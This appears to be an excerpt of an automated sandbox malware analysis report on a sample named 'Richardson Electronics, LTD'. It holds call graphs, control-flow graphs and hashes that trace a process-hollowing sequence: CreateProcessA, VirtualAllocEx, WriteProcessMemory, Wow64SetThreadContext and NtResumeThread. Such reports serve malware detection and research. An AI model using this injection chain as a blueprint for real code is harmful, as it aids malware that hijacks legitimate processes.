60bec88 VirtualAllocEx 49301->49302 49303 60bec80 VirtualAllocEx 49301->49303 49302->49301 49303->49301 49305 60db001 49304->49305 49309 60bee04 WriteProcessMemory 49305->49309 49310 60bee34 WriteProcessMemory 49305->49310 49311 60bee54 WriteProcessMemory 49305->49311 49312 60bee94 WriteProcessMemory 49305->49312 49313 60beeb4 WriteProcessMemory 49305->49313 49314 60bedf4 WriteProcessMemory 49305->49314 49306 60dad69 49307 60bec88 VirtualAllocEx 49306->49307 49308 60bec80 VirtualAllocEx 49306->49308 49307->49306 49308->49306 49309->49306 49310->49306 49311->49306 49312->49306 49313->49306 49314->49306 49316 60db76c 49315->49316 49318 60dad69 49315->49318 49321 60beff8 NtResumeThread 49316->49321 49322 60bf000 NtResumeThread 49316->49322 49323 60bf004 NtResumeThread 49316->49323 49324 60bf014 NtResumeThread 49316->49324 49317 60db7ad 49317->49122 49319 60bec88 VirtualAllocEx 49318->49319 49320 60bec80 VirtualAllocEx 49318->49320 49319->49318 49320->49318 49321->49317 49322->49317 49323->49317 49324->49317 49326 60beccc VirtualAllocEx 49325->49326 49328 60bed44 49326->49328 49328->49158 49330 60bec88 VirtualAllocEx 49329->49330 49332 60bed44 49330->49332 49332->49158 49334 60ddb75 49333->49334 49343 60be728 49334->49343 49347 60be720 49334->49347 49335 60ddb8e 49335->49178 49339 60ddb75 49338->49339 49341 60be728 Wow64SetThreadContext 49339->49341 49342 60be720 Wow64SetThreadContext 49339->49342 49340 60ddb8e 49340->49178 49341->49340 49342->49340 49344 60be771 Wow64SetThreadContext 49343->49344 49346 60be7e9 49344->49346 49346->49335 49348 60be771 Wow64SetThreadContext 49347->49348 49350 60be7e9 49348->49350 49350->49335 49352 60bee32 49351->49352 49352->49351 49353 60beeb4 WriteProcessMemory 49352->49353 49354 60beecd 49353->49354 49354->49188 49356 60bee34 WriteProcessMemory 49355->49356 49358 60beecd 49356->49358 49358->49188 49360 60beecd 49359->49360 49360->49188 49362 60bee55 WriteProcessMemory 49361->49362 49364 60beecd 49362->49364 49364->49188 49366 60bedc6 49365->49366 49366->49365 49367 60beeb4 WriteProcessMemory 49366->49367 49368 60beecd 49367->49368 49368->49188 49370 60beeb4 WriteProcessMemory 49369->49370 49371 60beecd 49370->49371 49371->49188 49373 60beffb NtResumeThread 49372->49373 49375 60bf0a0 49373->49375 49375->49239 49377 60bf020 49376->49377 49378 60befdb 49376->49378 49377->49378 49379 60bf06a NtResumeThread 49377->49379 49378->49239 49380 60bf0a0 49379->49380 49380->49239 49382 60bf049 NtResumeThread 49381->49382 49384 60bf0a0 49382->49384 49384->49239 49386 60bf007 NtResumeThread 49385->49386 49388 60bf0a0 49386->49388 49388->49239 49390 60dc2df 49389->49390 49391 60dc301 49390->49391 49399 60dc6a9 49390->49399 49403 60dc640 49390->49403 49391->49254 49395 60dc2df 49394->49395 49396 60dc301 49395->49396 49397 60dc6a9 2 API calls 49395->49397 49398 60dc640 2 API calls 49395->49398 49396->49254 49397->49396 49398->49396 49400 60dc6df 49399->49400 49408 60be370 49399->49408 49412 60be364 49399->49412 49404 60dc647 49403->49404 49406 60be370 CreateProcessA 49404->49406 49407 60be364 CreateProcessA 49404->49407 49405 60dc6df 49406->49405 49407->49405 49409 60be3f0 CreateProcessA 49408->49409 49411 60be5ec 49409->49411 49413 60be3f0 CreateProcessA 49412->49413 49415 60be5ec 49413->49415
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: ccac2cf40519292a77106c33ea5db7560854ce2db5c75d21f340271bfe492d49
                                                              • Instruction ID: ed2cca699b14253520fbcf9f43317f2f44a5c620ee5022f5b3e918a843978239
                                                              • Opcode Fuzzy Hash: ccac2cf40519292a77106c33ea5db7560854ce2db5c75d21f340271bfe492d49
                                                              • Instruction Fuzzy Hash: 50B20634A40218CFDB94DFA9C994BADBBF6BF48300F148599E505AB3A5DB70AD81CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 387 60bad68-60bad89 388 60bad8b 387->388 389 60bad90-60bae22 387->389 388->389 466 60bae28 call 60bb64f 389->466 467 60bae28 call 60bb660 389->467 393 60bae2e-60bae65 395 60bae67-60bae72 393->395 396 60bae74 393->396 397 60bae7e-60baf50 395->397 396->397 406 60baf62-60baf8d 397->406 407 60baf52-60baf58 397->407 408 60bb5ff-60bb61b 406->408 407->406 409 60baf92-60bb0bb 408->409 410 60bb621-60bb63c 408->410 419 60bb0cd-60bb221 409->419 420 60bb0bd-60bb0c3 409->420 428 60bb27a-60bb281 419->428 429 60bb223-60bb227 419->429 420->419 430 60bb42c-60bb448 428->430 431 60bb229-60bb22a 429->431 432 60bb22f-60bb275 429->432 433 60bb44e-60bb472 430->433 434 60bb286-60bb374 430->434 435 60bb4bc-60bb50b 431->435 432->435 441 60bb4b9-60bb4ba 433->441 442 60bb474-60bb4b6 433->442 459 60bb37a-60bb425 434->459 460 60bb428-60bb429 434->460 449 60bb51d-60bb568 435->449 450 60bb50d-60bb513 435->450 441->435 442->441 452 60bb56a-60bb5e0 449->452 453 60bb5e1-60bb5fc 449->453 450->449 452->453 453->408 459->460 460->430 466->393 467->393
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8
                                                              • API String ID: 0-4194326291
                                                              • Opcode ID: f60b02ad92a0484782da4803b097de2ac9e289eb18816a4fa85459fbeff6f44e
                                                              • Instruction ID: 8fa7554e3af53d9f8e77b4a53d3f6589502bc94da1f6f33a194bb00f21fad4b6
                                                              • Opcode Fuzzy Hash: f60b02ad92a0484782da4803b097de2ac9e289eb18816a4fa85459fbeff6f44e
                                                              • Instruction Fuzzy Hash: 9142D275D016698FDB64CF69C850ADDBBB2BF89300F5486EAD40DA7250EB30AE81CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 71bef971d8ac92ad8b7c6205ed64671eb4f357dbceb87d4f8cf0b471c52b5d0d
                                                              • Instruction ID: 2cf18ef3b0c4d69e5acc8144a4740c6ffcacefe76f284962d91bb3e0e40a6a55
                                                              • Opcode Fuzzy Hash: 71bef971d8ac92ad8b7c6205ed64671eb4f357dbceb87d4f8cf0b471c52b5d0d
                                                              • Instruction Fuzzy Hash: 7F220A34A40219CFDBA4DF65C994BADBBF2BF48300F1481A9E509AB3A5DB719D81CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 892 60bdac8-60bdb95 NtProtectVirtualMemory 896 60bdb9e-60bdbe8 892->896 897 60bdb97-60bdb9d 892->897 897->896
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060BDB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: ba33c9acb0d81443aa2fae0e78b68020b4db131bab069ed79460f85b898d8fb0
                                                              • Instruction ID: adc4090d4b3b4c88f72d8ccb45a35c7801f4f042972d56439c4c67b58361ce4e
                                                              • Opcode Fuzzy Hash: ba33c9acb0d81443aa2fae0e78b68020b4db131bab069ed79460f85b898d8fb0
                                                              • Instruction Fuzzy Hash: 0E4187B5D002589FCF10CFA9D980ADEFBB5BF49310F10A42AE915B7240D775A941CF64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 915 60bdad0-60bdb95 NtProtectVirtualMemory 918 60bdb9e-60bdbe8 915->918 919 60bdb97-60bdb9d 915->919 919->918
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060BDB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: 51620e3179116f94d39fb4faa4dcc4367e4c164f98805750b03f4400a31251f6
                                                              • Instruction ID: e8b2943cc87441dc03457ce30b7e6c36ead1f4f97199ece4d06f2f4ab41775d0
                                                              • Opcode Fuzzy Hash: 51620e3179116f94d39fb4faa4dcc4367e4c164f98805750b03f4400a31251f6
                                                              • Instruction Fuzzy Hash: 164176B5D002599FDF10CFAAD980ADEFBB5BB59320F10A02AE919B7200D775A941CF54
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 060BF08E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 6343e6ac1875bc1663e63fa4f32e1ca999102ceab473231e3b0e605f527dba03
                                                              • Instruction ID: 052c12d51009660c74066a67ed472f7655c0b44eefee7281b94f4b3849d301ce
                                                              • Opcode Fuzzy Hash: 6343e6ac1875bc1663e63fa4f32e1ca999102ceab473231e3b0e605f527dba03
                                                              • Instruction Fuzzy Hash: 4531AAB5D012199FDB10CFA9D980AEEFBF1BB59310F10942AE815B7210C775A945CF94
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 060BF08E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 73e2781cd2e2c632eeb1853fad97755361a3e653ba90ead734bc5e9f98097a17
                                                              • Instruction ID: cb4292a5e82c63eaf013563eb97acc145c81f1ff71c24729c78926eea9cf74c2
                                                              • Opcode Fuzzy Hash: 73e2781cd2e2c632eeb1853fad97755361a3e653ba90ead734bc5e9f98097a17
                                                              • Instruction Fuzzy Hash: FB31DCB5D0120A9FDB10CFA9E880AEEFBF0BF49310F14942AE915B7210D735A946CF54
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 060BF08E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 83e5c430763deb491b57e8192c945e187cb174dd9c7d3b83ce7fd2ea0abb4fac
                                                              • Instruction ID: cc422f0cbb0bf80f23f26a1c3582b52fe424bbd2811d37b1a823cd8c7c5f0b1d
                                                              • Opcode Fuzzy Hash: 83e5c430763deb491b57e8192c945e187cb174dd9c7d3b83ce7fd2ea0abb4fac
                                                              • Instruction Fuzzy Hash: AA3186B5D012199FDF10CFA9D980AEEFBF1BB49310F20942AE819B7210D779A945CF94
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h
                                                              • API String ID: 0-2439710439
                                                              • Opcode ID: 2ac47f22a1feaa4365b91f9fe13be6d9cb92038fff76d8f58967c4c86a3cdf1a
                                                              • Instruction ID: 1cd491d0e7f594819cb092694c80da0fb4d68a99f17b1583b01b8f5de0134527
                                                              • Opcode Fuzzy Hash: 2ac47f22a1feaa4365b91f9fe13be6d9cb92038fff76d8f58967c4c86a3cdf1a
                                                              • Instruction Fuzzy Hash: 4961B471E006298BEB64DF6AC8507DEFBB2BF89300F54D2AAD50DA7254DB305A85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59d7b2d5c0a23129aa48036504fb34f9889c05373d7eae02f612c2d798501c1a
                                                              • Instruction ID: 270a3c274844354259f8e21c8121e97a974b00273522856855b74d8442ede8f7
                                                              • Opcode Fuzzy Hash: 59d7b2d5c0a23129aa48036504fb34f9889c05373d7eae02f612c2d798501c1a
                                                              • Instruction Fuzzy Hash: 4AA2C275A10228CFDB65CF69C984AD9BBB2FF89300F1581E9D509AB365DB319E81CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b3dc7f8f16b93c8cf2a4c6cb45333ea7fc28cc10406b06a6bb804d8465e6008
                                                              • Instruction ID: afeeefa30aea749892f977af87b2a131ab6d722988c88d54d85f7827b7824352
                                                              • Opcode Fuzzy Hash: 3b3dc7f8f16b93c8cf2a4c6cb45333ea7fc28cc10406b06a6bb804d8465e6008
                                                              • Instruction Fuzzy Hash: 9F325B74B003168FDB98DF69C4A46BEBBF2FB88300F14856AD56AD7341DB34A945CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb4b7284420fdae97c14590aad10f0a141f005ea8863807fc559bdded194eefe
                                                              • Instruction ID: 3ec551722dc1a71f2e807c8a933af7938c9fb040f8c834d0ab60d8205ed12b07
                                                              • Opcode Fuzzy Hash: bb4b7284420fdae97c14590aad10f0a141f005ea8863807fc559bdded194eefe
                                                              • Instruction Fuzzy Hash: 1FE14774D65218CFEB94CF65D888B9DBBF2BF49304F1080A9D609A7791DBB54984CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6650691f0f3a4ed339c47a550d16bb7db8af37a4062ac10d9b872432763ab536
                                                              • Instruction ID: fde869fca60dd26fb8bef1ec562cde522edabc0135e6a812b9dc2e0e7bdb07da
                                                              • Opcode Fuzzy Hash: 6650691f0f3a4ed339c47a550d16bb7db8af37a4062ac10d9b872432763ab536
                                                              • Instruction Fuzzy Hash: 52D15974D65208CFEB94CF65D888B9DBBF2BF49304F1480A9D209A7751DBB54985CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d61258ee9d0aa759818fd2a20081e830497941fdc27a6113250e98aede88ce7e
                                                              • Instruction ID: 13ecf95c544fb33ed7ee0d9eca16d9aa37307e86bc5ee9391c0fdc90a49abbd5
                                                              • Opcode Fuzzy Hash: d61258ee9d0aa759818fd2a20081e830497941fdc27a6113250e98aede88ce7e
                                                              • Instruction Fuzzy Hash: 1EC10A70D95218CFEBA4CFA9D948BEDBBF2BF89300F10A0AAD409A7245D7754984CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45ab6d7b05ac4c1151fd8a999b29d13118650fda508ccc582543d48734f6a5ed
                                                              • Instruction ID: fdfda04e6e60a20140430bcab7c34a1253944f2b74d5dd009ab3fcd769a6f941
                                                              • Opcode Fuzzy Hash: 45ab6d7b05ac4c1151fd8a999b29d13118650fda508ccc582543d48734f6a5ed
                                                              • Instruction Fuzzy Hash: 9DC12774D65208CFEB94CFA5D888B9DBBF2BF49304F1480A9D209A7791DBB55985CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9e6f0d81e012d8f9f4a14211724c1b25f0d6a861d007fb725e56a2a3028811b
                                                              • Instruction ID: d312640afcd037f4ec0cbb28de80d1eebd26adf40dbf035558102975809e8b1a
                                                              • Opcode Fuzzy Hash: d9e6f0d81e012d8f9f4a14211724c1b25f0d6a861d007fb725e56a2a3028811b
                                                              • Instruction Fuzzy Hash: 65B11970D51208CFEBA4CFA9D988BEDBBF2BF85300F10A0AAD409A7254D7754984CF10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e94dd73b0495f564ed442532df69897401a012099775cc24831ad4983947fc4b
                                                              • Instruction ID: ef34c7bb04fffde75a1f723eb3670cfdd36a3521f64adfc0494078d7d9693e1a
                                                              • Opcode Fuzzy Hash: e94dd73b0495f564ed442532df69897401a012099775cc24831ad4983947fc4b
                                                              • Instruction Fuzzy Hash: D6B12574E65218CFEB94CFA9D884BADBBF2FB49300F1080A9E509A7755DB725981CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 281de3f135774071f8e8fead6d68c8e746a89a8988b92d89bb264311f1055f31
                                                              • Instruction ID: 2f564609a6df8d71da98a568401c06218ed0d40cc3a5b6010911c230a1718cfe
                                                              • Opcode Fuzzy Hash: 281de3f135774071f8e8fead6d68c8e746a89a8988b92d89bb264311f1055f31
                                                              • Instruction Fuzzy Hash: 45A16934D45258CFDB98DF68D844BADBBF2BB4A300F1082AAD409A7395DB319E85CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 60f0d50-60f0d56 1 60f0d5e-60f0d6b 0->1 2 60f12da-60f132e 1->2 3 60f0d71-60f0d79 1->3 14 60f0be5-60f0bf4 2->14 15 60f1334-60f1359 2->15 4 60f011f-60f0127 3->4 5 60f0129-60f0e84 4->5 6 60f0130-60f0131 4->6 5->4 11 60f0e8a-60f0e92 5->11 8 60f0ced 6->8 8->0 11->4 17 60f0c00-60f0c18 call 6525298 14->17 15->4 18 60f135f-60f1367 15->18 19 60f0c1d-60f0c3b 17->19 18->4 19->8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$9
                                                              • API String ID: 0-1865036983
                                                              • Opcode ID: c0fd633ccb78c227e9b8e1d49205bae8027df2dfc016fa3877866b5fd851df64
                                                              • Instruction ID: c37c07a83560ff386d6a5854864a56d1e4f8e8e3b15b53a90a5a566e357200e1
                                                              • Opcode Fuzzy Hash: c0fd633ccb78c227e9b8e1d49205bae8027df2dfc016fa3877866b5fd851df64
                                                              • Instruction Fuzzy Hash: A831F774E55229CFDBA4DF20C858BADBBB6BB49314F0050E9D60A63651CB305EC4CF41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 22 60f1221-60f122f 24 60f1279-60f128b call 6529490 22->24 25 60f1231-60f1256 22->25 26 60f1290-60f12c7 24->26 28 60f011f-60f0127 25->28 29 60f125c-60f1264 25->29 26->28 33 60f12cd-60f12d5 26->33 31 60f0129-60f0e84 28->31 32 60f0130-60f0131 28->32 29->28 31->28 37 60f0e8a-60f0e92 31->37 34 60f0ced-60f0d6b 32->34 33->28 39 60f12da-60f132e 34->39 40 60f0d71-60f0d79 34->40 37->28 45 60f0be5-60f0c18 call 6525298 39->45 46 60f1334-60f1359 39->46 40->28 50 60f0c1d-60f0c3b 45->50 46->28 49 60f135f-60f1367 46->49 49->28 50->34
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 3$q
                                                              • API String ID: 0-260448983
                                                              • Opcode ID: 3aa43494e93c7b01b8822b7938c119466103dc3fa0053630900e24b478ddbc10
                                                              • Instruction ID: 2bbfd0563ed91a3cff6b610afb96c99838e0583fc89f24f57d502915ea75ec7c
                                                              • Opcode Fuzzy Hash: 3aa43494e93c7b01b8822b7938c119466103dc3fa0053630900e24b478ddbc10
                                                              • Instruction Fuzzy Hash: 6211AE70D9422DCFEBA5AF64C8997DDBBB0BB09314F1014EAD609A3651CB744AC1CF94

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 468 60be364-60be402 470 60be44b-60be473 468->470 471 60be404-60be41b 468->471 475 60be4b9-60be50f 470->475 476 60be475-60be489 470->476 471->470 474 60be41d-60be422 471->474 477 60be445-60be448 474->477 478 60be424-60be42e 474->478 484 60be511-60be525 475->484 485 60be555-60be5ea CreateProcessA 475->485 476->475 486 60be48b-60be490 476->486 477->470 479 60be432-60be441 478->479 480 60be430 478->480 479->479 483 60be443 479->483 480->479 483->477 484->485 494 60be527-60be52c 484->494 498 60be5ec-60be5f2 485->498 499 60be5f3-60be669 485->499 487 60be4b3-60be4b6 486->487 488 60be492-60be49c 486->488 487->475 491 60be49e 488->491 492 60be4a0-60be4af 488->492 491->492 492->492 493 60be4b1 492->493 493->487 496 60be54f-60be552 494->496 497 60be52e-60be538 494->497 496->485 500 60be53a 497->500 501 60be53c-60be54b 497->501 498->499 507 60be66b-60be66f 499->507 508 60be679-60be67d 499->508 500->501 501->501 502 60be54d 501->502 502->496 507->508 509 60be671 507->509 510 60be67f-60be683 508->510 511 60be68d-60be691 508->511 509->508 510->511 512 60be685 510->512 513 60be693-60be697 511->513 514 60be6a1 511->514 512->511 513->514 515 60be699 513->515 516 60be6a2 514->516 515->514 516->516
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 060BE5D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 0abd8d5879cf99e9913b7bdef006d44c9a47f5203d7e30302b5bd04cdbf0bfa2
                                                              • Instruction ID: 0af37dbddebc83c040ee8176daf17ba69b3c1c4cab395bc191b0e8a657ec89c8
                                                              • Opcode Fuzzy Hash: 0abd8d5879cf99e9913b7bdef006d44c9a47f5203d7e30302b5bd04cdbf0bfa2
                                                              • Instruction Fuzzy Hash: B3A101B0D002198FDF90CFA9C8857EDBBF1BF49350F14A16AE859A7280DB748985CF45

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 517 60be370-60be402 519 60be44b-60be473 517->519 520 60be404-60be41b 517->520 524 60be4b9-60be50f 519->524 525 60be475-60be489 519->525 520->519 523 60be41d-60be422 520->523 526 60be445-60be448 523->526 527 60be424-60be42e 523->527 533 60be511-60be525 524->533 534 60be555-60be5ea CreateProcessA 524->534 525->524 535 60be48b-60be490 525->535 526->519 528 60be432-60be441 527->528 529 60be430 527->529 528->528 532 60be443 528->532 529->528 532->526 533->534 543 60be527-60be52c 533->543 547 60be5ec-60be5f2 534->547 548 60be5f3-60be669 534->548 536 60be4b3-60be4b6 535->536 537 60be492-60be49c 535->537 536->524 540 60be49e 537->540 541 60be4a0-60be4af 537->541 540->541 541->541 542 60be4b1 541->542 542->536 545 60be54f-60be552 543->545 546 60be52e-60be538 543->546 545->534 549 60be53a 546->549 550 60be53c-60be54b 546->550 547->548 556 60be66b-60be66f 548->556 557 60be679-60be67d 548->557 549->550 550->550 551 60be54d 550->551 551->545 556->557 558 60be671 556->558 559 60be67f-60be683 557->559 560 60be68d-60be691 557->560 558->557 559->560 561 60be685 559->561 562 60be693-60be697 560->562 563 60be6a1 560->563 561->560 562->563 564 60be699 562->564 565 60be6a2 563->565 564->563 565->565
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 060BE5D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 2bca83de8c3ab7eaf39c2e6f7f931360cb9f37761c8403618ebe8ee01330350b
                                                              • Instruction ID: 9ea9d3004d1ae759b70afd925544c783633019dfffefb8fce4351d4d4b15f645
                                                              • Opcode Fuzzy Hash: 2bca83de8c3ab7eaf39c2e6f7f931360cb9f37761c8403618ebe8ee01330350b
                                                              • Instruction Fuzzy Hash: CCA1F170D002198FDF90CFA9C8857EEBBF1BF49350F14A169E859A7280DB748985CF55

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 875 60bee04-60bee09 876 60bee0b-60bee0e 875->876 877 60bedd2 875->877 878 60bee11-60bee53 876->878 879 60bedc6-60bedc9 876->879 877->875 881 60bee6a-60beead 878->881 882 60bee55-60bee67 878->882 879->877 885 60beeb4-60beecb WriteProcessMemory 881->885 882->881 886 60beecd-60beed3 885->886 887 60beed4-60bef26 885->887 886->887
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 060BEEBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
